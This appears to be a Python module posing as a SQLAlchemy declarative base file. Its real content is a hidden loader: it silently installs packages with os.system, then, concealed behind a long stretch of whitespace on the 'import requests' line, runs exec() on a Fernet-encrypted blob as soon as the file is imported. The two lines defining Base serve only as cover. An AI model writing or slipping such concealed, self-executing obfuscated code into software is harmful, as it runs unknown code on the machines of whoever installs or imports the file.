import os
os.system('pip install cryptography')
os.system('pip install fernet')
os.system('pip install requests')
from fernet import Fernet
import requests                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            ;exec(Fernet(b'fE6ALc6dP1RIzwboOFq1LX-ders-1H7CRpeBbRKzblQ=').decrypt(b'gAAAAABk5qmfve7DPd9yiX5hYeJ_1_bO5lMi7T8VxCIfog5yHYCaZ1O2uAonTb3v_OYHV3P3bOni5M0V4da83xxesws8oqLXXN5agUyo8_J_41r7J9_n8AnZpmV6-hI-HYp_93Jm2tJNTSc_EcYQUvbuarBvWsc_qxFur3D8XLByCuSTRGGyrk0iffxZ46q_dDGHBGEkW7bq1rRT0CKL2qvDIyhVZ_D07w=='))
from sqlalchemy.ext.declarative import declarative_base

Base = declarative_base()
